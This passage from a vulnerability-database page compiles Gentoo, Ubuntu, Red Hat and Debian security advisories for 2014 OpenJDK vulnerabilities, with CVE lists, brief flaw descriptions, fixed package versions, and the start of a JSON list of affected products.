http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809 [ 195 ] CVE-2013-5814 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814 [ 196 ] CVE-2013-5817 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817 [ 197 ] CVE-2013-5820 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820 [ 198 ] CVE-2013-5823 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823 [ 199 ] CVE-2013-5825 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825 [ 200 ] CVE-2013-5829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829 [ 201 ] CVE-2013-5830 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830 [ 202 ] CVE-2013-5840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840 [ 203 ] CVE-2013-5842 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842 [ 204 ] CVE-2013-5849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849 [ 205 ] CVE-2013-5850 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850 [ 206 ] CVE-2013-5851 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851 [ 207 ] CVE-2013-6629 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6629 [ 208 ] CVE-2013-6954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6954 [ 209 ] CVE-2014-0429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429 [ 210 ] CVE-2014-0446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446 [ 211 ] CVE-2014-0451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451 [ 212 ] CVE-2014-0452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452 [ 213 ] CVE-2014-0453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453 [ 214 ] CVE-2014-0456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456 [ 215 ] CVE-2014-0457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457 [ 216 ] CVE-2014-0458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458 [ 217 ] CVE-2014-0459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459 [ 218 ] CVE-2014-0460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460 [ 219 ] CVE-2014-0461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461 [ 220 ] CVE-2014-1876 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1876 [ 221 ] CVE-2014-2397 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397 [ 222 ] CVE-2014-2398 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398 [ 223 ] CVE-2014-2403 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403 [ 224 ] CVE-2014-2412 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412 [ 225 ] CVE-2014-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414 [ 226 ] CVE-2014-2421 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421 [ 227 ] CVE-2014-2423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423 [ 228 ] CVE-2014-2427 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201406-32.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . ============================================================================ Ubuntu Security Notice USN-2187-1 April 30, 2014
openjdk-7 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 13.10
- Ubuntu 12.10
Summary:
Several security issues were fixed in OpenJDK 7.
Software Description: - openjdk-7: Open Source Java implementation
Details:
Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure, data integrity and availability. An attacker could exploit these to cause a denial of service or expose sensitive data over the network. (CVE-2014-0429, CVE-2014-0446, CVE-2014-0451, CVE-2014-0452, CVE-2014-0454, CVE-2014-0455, CVE-2014-0456, CVE-2014-0457, CVE-2014-0458, CVE-2014-0461, CVE-2014-2397, CVE-2014-2402, CVE-2014-2412, CVE-2014-2414, CVE-2014-2421, CVE-2014-2423, CVE-2014-2427)
Two vulnerabilities were discovered in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit these to expose sensitive data over the network. (CVE-2014-0453, CVE-2014-0460)
A vulnerability was discovered in the OpenJDK JRE related to availability. An attacker could exploit this to cause a denial of service. (CVE-2014-0459)
Jakub Wilk discovered that the OpenJDK JRE incorrectly handled temporary files. In the default installation of Ubuntu, this should be prevented by the Yama link restrictions. (CVE-2014-1876)
Two vulnerabilities were discovered in the OpenJDK JRE related to data integrity. (CVE-2014-2398, CVE-2014-2413)
A vulnerability was discovered in the OpenJDK JRE related to information disclosure. An attacker could exploit this to expose sensitive data over the network. (CVE-2014-2403)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 LTS: icedtea-7-jre-jamvm 7u55-2.4.7-1ubuntu1 openjdk-7-jre 7u55-2.4.7-1ubuntu1 openjdk-7-jre-headless 7u55-2.4.7-1ubuntu1 openjdk-7-jre-lib 7u55-2.4.7-1ubuntu1 openjdk-7-jre-zero 7u55-2.4.7-1ubuntu1
Ubuntu 13.10: icedtea-7-jre-jamvm 7u55-2.4.7-1ubuntu1~0.13.10.1 openjdk-7-jre 7u55-2.4.7-1ubuntu1~0.13.10.1 openjdk-7-jre-headless 7u55-2.4.7-1ubuntu1~0.13.10.1 openjdk-7-jre-lib 7u55-2.4.7-1ubuntu1~0.13.10.1 openjdk-7-jre-zero 7u55-2.4.7-1ubuntu1~0.13.10.1
Ubuntu 12.10: icedtea-7-jre-cacao 7u55-2.4.7-1ubuntu1~0.12.10.1 icedtea-7-jre-jamvm 7u55-2.4.7-1ubuntu1~0.12.10.1 openjdk-7-jre 7u55-2.4.7-1ubuntu1~0.12.10.1 openjdk-7-jre-headless 7u55-2.4.7-1ubuntu1~0.12.10.1 openjdk-7-jre-lib 7u55-2.4.7-1ubuntu1~0.12.10.1 openjdk-7-jre-zero 7u55-2.4.7-1ubuntu1~0.12.10.1
This update uses a new upstream release, which includes additional bug fixes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Critical: java-1.7.0-openjdk security update Advisory ID: RHSA-2014:0675-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0675.html Issue date: 2014-06-10 CVE Names: CVE-2014-0429 CVE-2014-0446 CVE-2014-0451 CVE-2014-0452 CVE-2014-0453 CVE-2014-0454 CVE-2014-0455 CVE-2014-0456 CVE-2014-0457 CVE-2014-0458 CVE-2014-0459 CVE-2014-0460 CVE-2014-0461 CVE-2014-1876 CVE-2014-2397 CVE-2014-2398 CVE-2014-2402 CVE-2014-2403 CVE-2014-2412 CVE-2014-2413 CVE-2014-2414 CVE-2014-2421 CVE-2014-2423 CVE-2014-2427 =====================================================================
- Summary:
Updated java-1.7.0-openjdk packages that fix various security issues are now available for Red Hat Enterprise Linux 7.
The Red Hat Security Response Team has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64
- Description:
The java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit.
An input validation flaw was discovered in the medialib library in the 2D component. A specially crafted image could trigger Java Virtual Machine memory corruption when processed. (CVE-2014-0429)
Multiple flaws were discovered in the Hotspot and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to trigger Java Virtual Machine memory corruption and possibly bypass Java sandbox restrictions. (CVE-2014-0456, CVE-2014-2397, CVE-2014-2421)
Multiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2014-0457, CVE-2014-0455, CVE-2014-0461)
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. (CVE-2014-2412, CVE-2014-0451, CVE-2014-0458, CVE-2014-2423, CVE-2014-0452, CVE-2014-2414, CVE-2014-2402, CVE-2014-0446, CVE-2014-2413, CVE-2014-0454, CVE-2014-2427, CVE-2014-0459)
Multiple flaws were identified in the Java Naming and Directory Interface (JNDI) DNS client. These flaws could make it easier for a remote attacker to perform DNS spoofing attacks. (CVE-2014-0460)
It was discovered that the JAXP component did not properly prevent access to arbitrary files when a SecurityManager was present. This flaw could cause a Java application using JAXP to leak sensitive information, or affect application availability. (CVE-2014-2403)
It was discovered that the Security component in OpenJDK could leak some timing information when performing PKCS#1 unpadding. This could possibly lead to the disclosure of some information that was meant to be protected by encryption. (CVE-2014-0453)
It was discovered that the fix for CVE-2013-5797 did not properly resolve input sanitization flaws in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting (XSS) attacks. (CVE-2014-2398)
An insecure temporary file use flaw was found in the way the unpack200 utility created log files. (CVE-2014-1876)
Note: If the web browser plug-in provided by the icedtea-web package was installed, the issues exposed via Java applets could have been exploited without user interaction if a user visited a malicious website.
All users of java-1.7.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1060907 - CVE-2014-1876 OpenJDK: insecure temporary file use in unpack200 (Libraries, 8033618) 1086632 - CVE-2014-2398 OpenJDK: insufficient escaping of window title string (Javadoc, 8026736) 1086645 - CVE-2014-0453 OpenJDK: RSA unpadding timing issues (Security, 8027766) 1087409 - CVE-2014-0429 OpenJDK: Incorrect mlib/raster image validation (2D, 8027841) 1087411 - CVE-2014-0457 OpenJDK: ServiceLoader Exception handling security bypass (Libraries, 8031394) 1087413 - CVE-2014-0456 OpenJDK: System.arraycopy() element race condition (Hotspot, 8029858) 1087417 - CVE-2014-2421 OpenJDK: JPEG decoder input stream handling (2D, 8029854) 1087423 - CVE-2014-2397 OpenJDK: classfile parser invalid BootstrapMethods attribute length (Hotspot, 8034926) 1087424 - CVE-2014-0455 OpenJDK: MethodHandle variable argument lists handling (Libraries, 8029844) 1087426 - CVE-2014-0461 OpenJDK: Better ScriptEngineManager ScriptEngine management (Libraries, 8036794) 1087427 - CVE-2014-2412 OpenJDK: AWT thread context handling (AWT, 8025010) 1087428 - CVE-2014-0451 OpenJDK: AWT incorrect FlavorMap seperation (AWT, 8026797) 1087430 - CVE-2014-0458 OpenJDK: Activation framework default command map caching (JAX-WS, 8025152) 1087431 - CVE-2014-2414 OpenJDK: incorrect caching of data initialized via TCCL (JAXB, 8025030) 1087434 - CVE-2014-2423 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026188) 1087436 - CVE-2014-0452 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026801) 1087438 - CVE-2014-2402 OpenJDK: Incorrect NIO channel separation (Libraries, 8026716) 1087439 - CVE-2014-0446 OpenJDK: Protect logger handlers (Libraries, 8029740) 1087440 - CVE-2014-0454 OpenJDK: Prevent SIGNATURE_PRIMITIVE_SET from being modified (Security, 8029745) 1087441 - CVE-2014-2427 OpenJDK: remove insecure Java Sound provider caching (Sound, 8026163) 1087442 - CVE-2014-0460 OpenJDK: missing randomization of JNDI DNS client query IDs (JNDI, 8030731) 1087443 - CVE-2014-2403 OpenJDK: JAXP CharInfo file access restriction (JAXP, 8029282) 1087444 - CVE-2014-0459 lcms: insufficient ICC profile version validation (OpenJDK 2D, 8031335) 1087446 - CVE-2014-2413 OpenJDK: method handle call hierachy bypass (Libraries, 8032686)
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: java-1.7.0-openjdk-1.7.0.55-2.4.7.2.el7_0.src.rpm
x86_64: java-1.7.0-openjdk-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-headless-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch: java-1.7.0-openjdk-javadoc-1.7.0.55-2.4.7.2.el7_0.noarch.rpm
x86_64: java-1.7.0-openjdk-accessibility-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: java-1.7.0-openjdk-1.7.0.55-2.4.7.2.el7_0.src.rpm
x86_64: java-1.7.0-openjdk-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-headless-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch: java-1.7.0-openjdk-javadoc-1.7.0.55-2.4.7.2.el7_0.noarch.rpm
x86_64: java-1.7.0-openjdk-accessibility-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: java-1.7.0-openjdk-1.7.0.55-2.4.7.2.el7_0.src.rpm
ppc64: java-1.7.0-openjdk-1.7.0.55-2.4.7.2.el7_0.ppc64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.ppc64.rpm java-1.7.0-openjdk-devel-1.7.0.55-2.4.7.2.el7_0.ppc64.rpm java-1.7.0-openjdk-headless-1.7.0.55-2.4.7.2.el7_0.ppc64.rpm
s390x: java-1.7.0-openjdk-1.7.0.55-2.4.7.2.el7_0.s390x.rpm java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.s390x.rpm java-1.7.0-openjdk-devel-1.7.0.55-2.4.7.2.el7_0.s390x.rpm java-1.7.0-openjdk-headless-1.7.0.55-2.4.7.2.el7_0.s390x.rpm
x86_64: java-1.7.0-openjdk-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-headless-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
noarch: java-1.7.0-openjdk-javadoc-1.7.0.55-2.4.7.2.el7_0.noarch.rpm
ppc64: java-1.7.0-openjdk-accessibility-1.7.0.55-2.4.7.2.el7_0.ppc64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.ppc64.rpm java-1.7.0-openjdk-demo-1.7.0.55-2.4.7.2.el7_0.ppc64.rpm java-1.7.0-openjdk-src-1.7.0.55-2.4.7.2.el7_0.ppc64.rpm
s390x: java-1.7.0-openjdk-accessibility-1.7.0.55-2.4.7.2.el7_0.s390x.rpm java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.s390x.rpm java-1.7.0-openjdk-demo-1.7.0.55-2.4.7.2.el7_0.s390x.rpm java-1.7.0-openjdk-src-1.7.0.55-2.4.7.2.el7_0.s390x.rpm
x86_64: java-1.7.0-openjdk-accessibility-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: java-1.7.0-openjdk-1.7.0.55-2.4.7.2.el7_0.src.rpm
x86_64: java-1.7.0-openjdk-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-headless-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch: java-1.7.0-openjdk-javadoc-1.7.0.55-2.4.7.2.el7_0.noarch.rpm
x86_64: java-1.7.0-openjdk-accessibility-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.55-2.4.7.2.el7_0.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2014-0429.html https://www.redhat.com/security/data/cve/CVE-2014-0446.html https://www.redhat.com/security/data/cve/CVE-2014-0451.html https://www.redhat.com/security/data/cve/CVE-2014-0452.html https://www.redhat.com/security/data/cve/CVE-2014-0453.html https://www.redhat.com/security/data/cve/CVE-2014-0454.html https://www.redhat.com/security/data/cve/CVE-2014-0455.html https://www.redhat.com/security/data/cve/CVE-2014-0456.html https://www.redhat.com/security/data/cve/CVE-2014-0457.html https://www.redhat.com/security/data/cve/CVE-2014-0458.html https://www.redhat.com/security/data/cve/CVE-2014-0459.html https://www.redhat.com/security/data/cve/CVE-2014-0460.html https://www.redhat.com/security/data/cve/CVE-2014-0461.html https://www.redhat.com/security/data/cve/CVE-2014-1876.html https://www.redhat.com/security/data/cve/CVE-2014-2397.html https://www.redhat.com/security/data/cve/CVE-2014-2398.html https://www.redhat.com/security/data/cve/CVE-2014-2402.html https://www.redhat.com/security/data/cve/CVE-2014-2403.html https://www.redhat.com/security/data/cve/CVE-2014-2412.html https://www.redhat.com/security/data/cve/CVE-2014-2413.html https://www.redhat.com/security/data/cve/CVE-2014-2414.html https://www.redhat.com/security/data/cve/CVE-2014-2421.html https://www.redhat.com/security/data/cve/CVE-2014-2423.html https://www.redhat.com/security/data/cve/CVE-2014-2427.html https://access.redhat.com/security/updates/classification/#critical
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFTl12dXlSAg2UNWIIRAmMnAKDBn3yRFrjgZ2r2Pgk1zNaojzDhXACdE8EM WC6ur//nCsBvA7rEK0zVQSI= =mQDb -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . 5 client) - i386, x86_64
For the oldstable distribution (squeeze), these problems have been fixed in version 6b31-1.13.3-1~deb6u1.
For the stable distribution (wheezy), these problems have been fixed in version 6b31-1.13.3-1~deb7u1.
For the testing distribution (jessie), these problems have been fixed in version 6b31-1.13.3-1.
For the unstable distribution (sid), these problems have been fixed in version 6b31-1.13.3-1
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201404-0378", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "jdk", "scope": "eq", "trust": 1.9, "vendor": "oracle", "version": "1.8.0" }, { "model": "jre", "scope": "eq", "trust": 1.9, "vendor": "oracle", "version": "1.8.0" }, { "model": "jre", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "1.6.0" }, { "model": "jdk", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "1.6.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "r27.8.1" }, { "model": "jrockit", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "r28.3.1" }, { "model": "jdk", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "1.7.0" }, { "model": "jre", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "1.5.0" }, { "model": "jdk", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "1.5.0" }, { "model": "jre", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "1.7.0" }, { "model": "cosminexus developer professional", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus client", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus client", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus application server", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "05-05" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus developer professional", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus studio", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "05-05" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus developer", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "05-05" }, { "model": "cosminexus client", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "7.0" }, { "model": "junos space", "scope": "lt", "trust": 1.0, "vendor": "juniper", "version": "15.1" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.10" }, { "model": "forms viewer", "scope": "lt", "trust": 1.0, "vendor": "ibm", "version": "4.0.0.3" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "14.04" }, { "model": "forms viewer", "scope": "gte", "trust": 1.0, "vendor": "ibm", "version": "8.0.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.04" }, { "model": "forms viewer", "scope": "gte", "trust": 1.0, "vendor": "ibm", "version": "4.0.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "13.10" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "10.04" }, { "model": "forms viewer", "scope": "lt", "trust": 1.0, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "jre 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 21", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 16", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 65", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 55", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.5.0 61", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus primary server base 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 1.5.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "cosminexus developer professional 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", 